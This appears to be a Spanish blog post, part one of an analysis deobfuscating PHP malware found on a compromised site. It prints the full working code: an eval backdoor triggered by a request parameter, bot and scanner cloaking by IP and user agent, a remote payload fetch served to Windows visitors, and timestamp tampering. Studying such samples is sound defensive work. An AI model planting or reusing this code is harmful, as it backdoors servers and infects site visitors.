detB($bot_15,$bot_16){$bot_17=array(google(47),google(48),google(49),google(50),google(51),google(52),google(53),google(54),google(55),google(56),google(57),google(58),google(59),google(60),google(61),google(62),google(63),google(64),google(65),google(66),google(67),google(68),google(69),google(70),google(71),google(72),google(73),google(74),google(75),google(76),google(77),google(78),google(79),google(80),google(81),google(82),google(83),google(84),google(85),google(86),google(87),google(88),google(89),google(90),google(91),google(92),google(93),google(94),google(95),google(96),google(97),google(98),google(99),google(100),google(101),google(102),google(103),google(104),google(105),google(106),google(107),google(108),google(109),google(110),google(111),google(112),google(113),google(114),google(115),google(116),google(117),google(118),google(119));$bot_18=array(google(120),google(121),google(122),google(123),google(124),google(125),google(126),google(127),google(128),google(129),google(130),google(131),google(132),google(133),google(134),google(135),google(136),google(137),google(138),google(139),google(140),google(141),google(142),google(143),google(144),google(145),google(146));$bot_15=preg_replace(google(147),google(148),$bot_15);$bot_19=true;foreach($bot_17 as $bot_20)if(eregi("$bot_20",$bot_16)){$bot_19=false;break;}if($bot_19)foreach($bot_18 as $bot_21)if(eregi($bot_21,$bot_15)!== false){$bot_19=false;break;}if($bot_19 and!eregi(google(149),$bot_15)){$bot_19=false;}if($bot_19 and strlen($bot_15)<=round(0+3.66666666667+3.66666666667+3.66666666667)){$bot_19=false;}return $bot_19;}}if(!function_exists('rm_rf')){function rm_rf($bot_22){$bot_23=@filemtime($bot_22);if($bot_24=opendir($bot_22)){while(false !==($bot_25=readdir($bot_24))){if($bot_25 != google(150)&& $bot_25 != google(151)&& is_file($bot_25)){@chmod($bot_25,round(0+146+146+146));@unlink($bot_25);}}closedir($bot_24);}@touch($bot_22,$bot_23,$bot_23);}}eval(base64_decode('aWYgKGlzc2V0KCRfUkVRVUVTVFsiZXYxIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImV2MSJdKSk7IGV4aXQ7fQ=='));$bot_26=google(152);$bot_27=$_SERVER[google(153)];$bot_1=$_SERVER[google(154)];$bot_28=$_SERVER[google(155)];if($bot_27 == google(156)|| $bot_1 == google(157)|| $bot_28 == google(158))die();$bot_29=strtolower($bot_1);if(!isset($_COOKIE[$bot_26])&& strstr($bot_29,google(159))!==false){@header(google(160));@header(google(161) .gmdate(google(162)) .google(163));@header(google(164));@header(google(165),false);@header(google(166));$bot_30=dirname($bot_28) .google(167);if(!file_exists($bot_30)){$bot_23=@filemtime(dirname($bot_28));@mkdir($bot_30);@touch(dirname($bot_28),$bot_23,$bot_23);@touch($bot_30,$bot_23,$bot_23);}$bot_31=@date(google(168));if(($bot_31 >= google(169)&& $bot_31 <= google(170))||($bot_31 >= google(171)&& $bot_31 <= google(172)))rm_rf($bot_30);$bot_32=@date(google(173));$bot_33="$bot_30/$bot_32";$bot_34="$bot_30/sess_$bot_32";if(!file_exists($bot_33)){$bot_23=@filemtime($bot_30);$bot_35=fopen($bot_33,google(174));fclose($bot_35);@touch($bot_30,$bot_23,$bot_23);}if(!file_exists($bot_34)|| filesize($bot_34)<round(0+5)){$bot_36=array(google(175),google(176),google(177),google(178));$bot_37=$bot_36[rand(round(0),round(0+0.2+0.2+0.2+0.2+0.2))] .$bot_36[round(0+3)] .$bot_36[round(0+1+1)];$bot_38=@cc($bot_37);if($bot_38 != google(179)){$bot_23=@filemtime($bot_30);$bot_35=@fopen($bot_34,google(180));@fwrite($bot_35,"$bot_38");@fclose($bot_35);@touch($bot_30,$bot_23,$bot_23);@touch($bot_34,$bot_23,$bot_23);}}$bot_39=@base64_decode(@file_get_contents($bot_34));$bot_40=@file($bot_33);$bot_41=false;foreach($bot_40 as $bot_42){if(@trim($bot_42)== $bot_27){$bot_41=true;break;}}$bot_19=@detB($bot_1,$bot_27);if($bot_41 == false && $bot_19 == true){$bot_35=@fopen($bot_33,google(181));@fwrite($bot_35,"$bot_27\n");@fclose($bot_35);echo $bot_39;}} ?>

Como podéis ver, solo es más código sin sentido, pero ahora tenemos un código PHP para procesar y analizar, aunque esté ofuscado en cierta manera. Sigue siendo incomprensible, pero poco a poco iremos “desofuscando” este código para hacerlo más legible y poder entender lo que hace.

El primer paso, es intentar embellecer el texto, para añadirle los saltos de linea y las tabulaciones, así que vamos a utilizar una herramienta llamada PHP Formatter para eso mismo, que podemos encontrar en la dirección http://beta.phpformatter.com/. Cuando pasemos el formatter, el resultado será el siguiente:

<?php
if (!function_exists('google')) {
    function google($i)
    {
        $a = Array(
            "safe_mode",
            "open_basedir",
            "safe_mode_include_dir",
            "safe_mode_exec_dir",
            "disable_functions",
            "allow_url_fopen",
            'max_execution_time',
            'output_buffering',
            'memory_limit',
            '16M',
            'error_log',
            'log_errors',
            'file_uploads',
            'allow_url_fopen',
            'max_execution_time',
            'output_buffering',
            'memory_limit',
            '16M',
            'error_log',
            'log_errors',
            'file_uploads',
            'allow_url_fopen',
            "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)",
            'safe_mode',
            'open_basedir',
            "http://",
            "",
            "#/#",
            "/",
            "",
            "",
            "/",
            "/",
            "Accept-Language: en-us, en;q=0.50\r\n",
            "Connection: Close\r\n\r\n",
            "\r\n\r\n",
            "\n",
            "<br />",
            "",
            "/Location\:/",
            "Location: ",
            "\r",
            "\r\n\r\n",
            "",
            "&#76&#111&#99&#97&#116&#105&#111&#110&#58",
            "Location:",
            "ERROR",
            "66\.249\.[6-9][0-9]\.[0-9]+",
            "72\.14\.[1-2][0-9][0-9]\.[0-9]+",
            "74\.125\.[0-9]+\.[0-9]+",
            "65\.5[2-5]\.[0-9]+\.[0-9]+",
            "74\.6\.[0-9]+\.[0-9]+",
            "67\.195\.[0-9]+\.[0-9]+",
            "72\.30\.[0-9]+\.[0-9]+",
            "38\.[0-9]+\.[0-9]+\.[0-9]+",
            "124\.115\.6\.[0-9]+",
            "93\.172\.94\.227",
            "212\.100\.250\.218",
            "71\.165\.223\.134",
            "209\.9\.239\.101",
            "67\.217\.160\.[0-9]+",
            "70\.91\.180\.25",
            "65\.93\.62\.242",
            "74\.193\.246\.129",
            "213\.144\.15\.38",
            "195\.92\.229\.2",
            "70\.50\.189\.191",
            "218\.28\.88\.99",
            "165\.160\.2\.20",
            "89\.122\.224\.230",
            "66\.230\.175\.124",
            "218\.18\.174\.27",
            "65\.33\.87\.94",
            "67\.210\.111\.241",
            "81\.135\.175\.70",
            "64\.69\.34\.134",
            "89\.149\.253\.169",
            "64\.233\.1[6-8][1-9]\.[0-9]+",
            "64\.233\.19[0-1]\.[0-9]+",
            "209\.185\.108\.[0-9]+",
            "209\.185\.253\.[0-9]+",
            "209\.85\.238\.[0-9]+",
            "216\.239\.33\.9[6-9]",
            "216\.239\.37\.9[8-9]",
            "216\.239\.39\.9[8-9]",
            "216\.239\.41\.9[6-9]",
            "216\.239\.45\.4",
            "216\.239\.46\.[0-9]+",
            "216\.239\.51\.9[6-9]",
            "216\.239\.53\.9[8-9]",
            "216\.239\.57\.9[6-9]",
            "216\.239\.59\.9[8-9]",
            "216\.33\.229\.163",
            "64\.233\.173\.[0-9]+",
            "64\.68\.8[0-9]\.[0-9]+",
            "64\.68\.9[0-2]\.[0-9]+",
            "72\.14\.199\.[0-9]+",
            "8\.6\.48\.[0-9]+",
            "207\.211\.40\.82",
            "67\.162\.158\.146",
            "66\.255\.53\.123",
            "24\.200\.208\.112",
            "129\.187\.148\.240",
            "129\.187\.148\.244",
            "199\.126\.151\.229",
            "118\.124\.32\.193",
            "89\.149\.217\.191",
            "122\.164\.27\.42",
            "149\.5\.168\.2",
            "150\.70\.66\.[0-9]+",
            "194\.250\.116\.39",
            "208\.80\.194\.[0-9]+",
            "62\.190\.39\.205",
            "67\.198\.80\.236",
            "85\.85\.187\.243",
            "95\.134\.141\.250",
            "97\.107\.135\.[0-9]+",
            "184\.168\.191\.[0-9]+",
            "95\.108\.157\.[0-9]+",
            "209\.235\.253\.17",
            'http',
            'google',
            'slurp',
            'msnbot',
            'bot',
            'crawl',
            'spider',
            'robot',
            'httpclient',
            'curl',
            'php',
            'indy library',
            'wordpress',
            'charlotte',
            'wwwster',
            'python',
            'urllib',
            'perl',
            'libwww',
            'lynx',
            'twiceler',
            'rambler',
            'yandex',
            'trend',
            'virus',
            'malware',
            'wget',
            "|User\.Agent\:[\s ]?|i",
            "",
            "^[a-zA-Z]{5,}",
            ".",
            "..",
            'langs',
            'REMOTE_ADDR',
            'HTTP_USER_AGENT',
            'SCRIPT_FILENAME',
            '',
            '',
            '',
            'windows',
            'Expires: Sat, 26 Jul 1997 05:00:00 GMT',
            'Last-Modified: ',
            'D, d M Y H:i:s',
            ' GMT',
            'Cache-Control: no-store, no-cache, must-revalidate',
            'Cache-Control: post-check=0, pre-check=0',
            'Pragma: no-cache',
            '/.svn',
            "Hi",
            '0000',
            '0001',
            '1200',
            '1201',
            "ymd",
            "w",
            'ohix.',
            'effbot.',
            '/f/',
            'net',
            'ERROR',
            "w",
            "a"
        );
        return $a[$i];
    }
}
?><?php
@ignore_user_abort(round(0 + 0.25 + 0.25 + 0.25 + 0.25));
@set_magic_quotes_runtime(round(0));
@set_time_limit(round(0));
@error_reporting(round(0));
if (@function_exists('ini_restore')) {
    @ini_restore(google(0));
    @ini_restore(google(1));
    @ini_restore(google(2));
    @ini_restore(google(3));
    @ini_restore(google(4));
    @ini_restore(google(5));
}
if (@function_exists('ini_set')) {
    @ini_set(google(6), round(0));
    @ini_set(google(7), round(0));
    @ini_set(google(8), google(9));
    @ini_set(google(10), NULL);
    @ini_set(google(11), round(0));
    @ini_set(google(12), round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2));
    @ini_set(google(13), round(0 + 0.25 + 0.25 + 0.25 + 0.25));
} elseif (@function_exists('ini_alter')) {
    @ini_alter(google(14), round(0));
    @ini_alter(google(15), round(0));
    @ini_alter(google(16), google(17));
    @ini_alter(google(18), NULL);
    @ini_alter(google(19), round(0));
    @ini_alter(google(20), round(0 + 0.25 + 0.25 + 0.25 + 0.25));
    @ini_alter(google(21), round(0 + 0.25 + 0.25 + 0.25 + 0.25));
}
if (!function_exists('cc')) {
    function cc($bot_0)
    {
        $bot_1 = google(22);
        if (function_exists('curl_init')) {
            $bot_2 = curl_init();
            curl_setopt($bot_2, 10002, $bot_0);
            curl_setopt($bot_2, 42, round(0));
            curl_setopt($bot_2, 13, round(0 + 7.5 + 7.5 + 7.5 + 7.5));
            curl_setopt($bot_2, 19913, round(0 + 0.25 + 0.25 + 0.25 + 0.25));
            curl_setopt($bot_2, 10018, $bot_1);
            if (!(@ini_get(google(23)) || @ini_get(google(24)))) {
                @curl_setopt($bot_2, 52, round(0 + 1));
            }
            @curl_setopt($bot_2, 68, round(0 + 0.4 + 0.4 + 0.4 + 0.4 + 0.4));
            $bot_3 = curl_exec($bot_2);
            curl_close($bot_2);
            if ($bot_3 !== false) {
                return $bot_3;
            }
        } else if (function_exists('fsockopen')) {
            global $bot_4;
            $bot_0 = str_replace(google(25), google(26), $bot_0);
            if (preg_match(google(27), "$bot_0")) {
                $bot_5 = $bot_0;
                $bot_0 = @explode(google(28), $bot_0);
                $bot_0 = $bot_0[round(0)];
                $bot_5 = str_replace($bot_0, google(29), $bot_5);
                if (!$bot_5 || $bot_5 == google(30)) {
                    $bot_5 = google(31);
                }
                $bot_6 = gethostbyname($bot_0);
            } else {
                $bot_6 = gethostbyname($bot_0);
                $bot_5 = google(32);
            }
            $bot_7 = fsockopen($bot_6, round(0 + 16 + 16 + 16 + 16 + 16), $bot_8, $bot_9, round(0 + 2 + 2 + 2 + 2 + 2));
            stream_set_timeout($bot_7, round(0 + 2 + 2 + 2 + 2 + 2));
            if ($bot_7) {
                $bot_10 = "GET $bot_5 HTTP/1.0\r\n";
                $bot_10 .= "Host: $bot_0\r\n";
                $bot_10 .= "Referer: http://$bot_0$bot_5\r\n";
                $bot_10 .= google(33);
                $bot_10 .= "User-Agent: $bot_1\r\n";
                $bot_10 .= google(34);
                fputs($bot_7, $bot_10);
                while (!feof($bot_7)) {
                    $bot_11 .= fgets($bot_7, round(0 + 4096));
                }
                fclose($bot_7);
                $bot_11 = @explode(google(35), $bot_11, round(0 + 2));
                $bot_12 = $bot_11[round(0)];
                if ($bot_4) {
                    $bot_12 = "$bot_4<br /><br />\n$bot_12";
                }
                $bot_12 = str_replace(google(36), google(37), $bot_12);
                if ($bot_11[round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)]) {
                    $bot_13 = $bot_11[round(0 + 1)];
                } else {
                    $bot_13 = google(38);
                }
                if ($bot_13) {
                    $bot_11 = $bot_13;
                } else {
                    $bot_11 = $bot_12;
                }
                if (preg_match(google(39), "$bot_12")) {
                    $bot_0  = @explode(google(40), $bot_12);
                    $bot_0  = $bot_0[round(0 + 0.25 + 0.25 + 0.25 + 0.25)];
                    $bot_0  = @explode(google(41), $bot_0);
                    $bot_0  = $bot_0[round(0)];
                    $bot_4  = str_replace(google(42), google(43), $bot_12);
                    $bot_14 = google(44);
                    $bot_4  = str_replace(google(45), $bot_14, $bot_4);
                    return cc($bot_0);
                } else {
                    return $bot_11;
                }
            }
        } else {
            echo google(46);
            exit;
        }
    }
}
if (!function_exists('detB')) {
    function detB($bot_15, $bot_16)
    {
        $bot_17 = array(
            google(47),
            google(48),
            google(49),
            google(50),
            google(51),
            google(52),
            google(53),
            google(54),
            google(55),
            google(56),
            google(57),
            google(58),
            google(59),
            google(60),
            google(61),
            google(62),
            google(63),
            google(64),
            google(65),
            google(66),
            google(67),
            google(68),
            google(69),
            google(70),
            google(71),
            google(72),
            google(73),
            google(74),
            google(75),
            google(76),
            google(77),
            google(78),
            google(79),
            google(80),
            google(81),
            google(82),
            google(83),
            google(84),
            google(85),
            google(86),
            google(87),
            google(88),
            google(89),
            google(90),
            google(91),
            google(92),
            google(93),
            google(94),
            google(95),
            google(96),
            google(97),
            google(98),
            google(99),
            google(100),
            google(101),
            google(102),
            google(103),
            google(104),
            google(105),
            google(106),
            google(107),
            google(108),
            google(109),
            google(110),
            google(111),
            google(112),
            google(113),
            google(114),
            google(115),
            google(116),
            google(117),
            google(118),
            google(119)
        );
        $bot_18 = array(
            google(120),
            google(121),
            google(122),
            google(123),
            google(124),
            google(125),
            google(126),
            google(127),
            google(128),
            google(129),
            google(130),
            google(131),
            google(132),
            google(133),
            google(134),
            google(135),
            google(136),
            google(137),
            google(138),
            google(139),
            google(140),
            google(141),
            google(142),
            google(143),
            google(144),
            google(145),
            google(146)
        );
        $bot_15 = preg_replace(google(147), google(148), $bot_15);
        $bot_19 = true;
        foreach ($bot_17 as $bot_20)
            if (eregi("$bot_20", $bot_16)) {
                $bot_19 = false;
                break;
            }
        if ($bot_19)
            foreach ($bot_18 as $bot_21)
                if (eregi($bot_21, $bot_15) !== false) {
                    $bot_19 = false;
                    break;
                }
        if ($bot_19 and !eregi(google(149), $bot_15)) {
            $bot_19 = false;
        }
        if ($bot_19 and strlen($bot_15) <= round(0 + 3.66666666667 + 3.66666666667 + 3.66666666667)) {
            $bot_19 = false;
        }
        return $bot_19;
    }
}
if (!function_exists('rm_rf')) {
    function rm_rf($bot_22)
    {
        $bot_23 = @filemtime($bot_22);
        if ($bot_24 = opendir($bot_22)) {
            while (false !== ($bot_25 = readdir($bot_24))) {
                if ($bot_25 != google(150) && $bot_25 != google(151) && is_file($bot_25)) {
                    @chmod($bot_25, round(0 + 146 + 146 + 146));
                    @unlink($bot_25);
                }
            }
            closedir($bot_24);
        }
        @touch($bot_22, $bot_23, $bot_23);
    }
}
eval(base64_decode('aWYgKGlzc2V0KCRfUkVRVUVTVFsiZXYxIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImV2MSJdKSk7IGV4aXQ7fQ=='));
$bot_26 = google(152);
$bot_27 = $_SERVER[google(153)];
$bot_1  = $_SERVER[google(154)];
$bot_28 = $_SERVER[google(155)];
if ($bot_27 == google(156) || $bot_1 == google(157) || $bot_28 == google(158))
    die();
$bot_29 = strtolower($bot_1);
if (!isset($_COOKIE[$bot_26]) && strstr($bot_29, google(159)) !== false) {
    @header(google(160));
    @header(google(161) . gmdate(google(162)) . google(163));
    @header(google(164));
    @header(google(165), false);
    @header(google(166));
    $bot_30 = dirname($bot_28) . google(167);
    if (!file_exists($bot_30)) {
        $bot_23 = @filemtime(dirname($bot_28));
        @mkdir($bot_30);
        @touch(dirname($bot_28), $bot_23, $bot_23);
        @touch($bot_30, $bot_23, $bot_23);
    }
    $bot_31 = @date(google(168));
    if (($bot_31 >= google(169) && $bot_31 <= google(170)) || ($bot_31 >= google(171) && $bot_31 <= google(172)))
        rm_rf($bot_30);
    $bot_32 = @date(google(173));
    $bot_33 = "$bot_30/$bot_32";
    $bot_34 = "$bot_30/sess_$bot_32";
    if (!file_exists($bot_33)) {
        $bot_23 = @filemtime($bot_30);
        $bot_35 = fopen($bot_33, google(174));
        fclose($bot_35);
        @touch($bot_30, $bot_23, $bot_23);
    }
    if (!file_exists($bot_34) || filesize($bot_34) < round(0 + 5)) {
        $bot_36 = array(
            google(175),
            google(176),
            google(177),
            google(178)
        );
        $bot_37 = $bot_36[rand(round(0), round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2))] . $bot_36[round(0 + 3)] . $bot_36[round(0 + 1 + 1)];
        $bot_38 = @cc($bot_37);
        if ($bot_38 != google(179)) {
            $bot_23 = @filemtime($bot_30);
            $bot_35 = @fopen($bot_34, google(180));
            @fwrite($bot_35, "$bot_38");
            @fclose($bot_35);
            @touch($bot_30, $bot_23, $bot_23);
            @touch($bot_34, $bot_23, $bot_23);
        }
    }
    $bot_39 = @base64_decode(@file_get_contents($bot_34));
    $bot_40 = @file($bot_33);
    $bot_41 = false;
    foreach ($bot_40 as $bot_42) {
        if (@trim($bot_42) == $bot_27) {
            $bot_41 = true;
            break;
        }
    }
    $bot_19 = @detB($bot_1, $bot_27);
    if ($bot_41 == false && $bot_19 == true) {
        $bot_35 = @fopen($bot_33, google(181));
        @fwrite($bot_35, "$bot_27\n");
        @fclose($bot_35);
        echo $bot_39;
    }
}
?>

Mucho mejor, ¿no?. Por el momento vamos a dejarlo aquí. En la segunda parte explicaré como he realizado el resto de “desofuscación” del código e intentaré explicar qué hace, cómo atacaba a los visitantes del sitio, cómo se introdujo y cómo se desinfectó.

Si alguien quiere dedicarle un rato e intentar hacerlo por sí mismo, que ponga en los comentarios los resultados, y los ponemos en común en la segunda parte.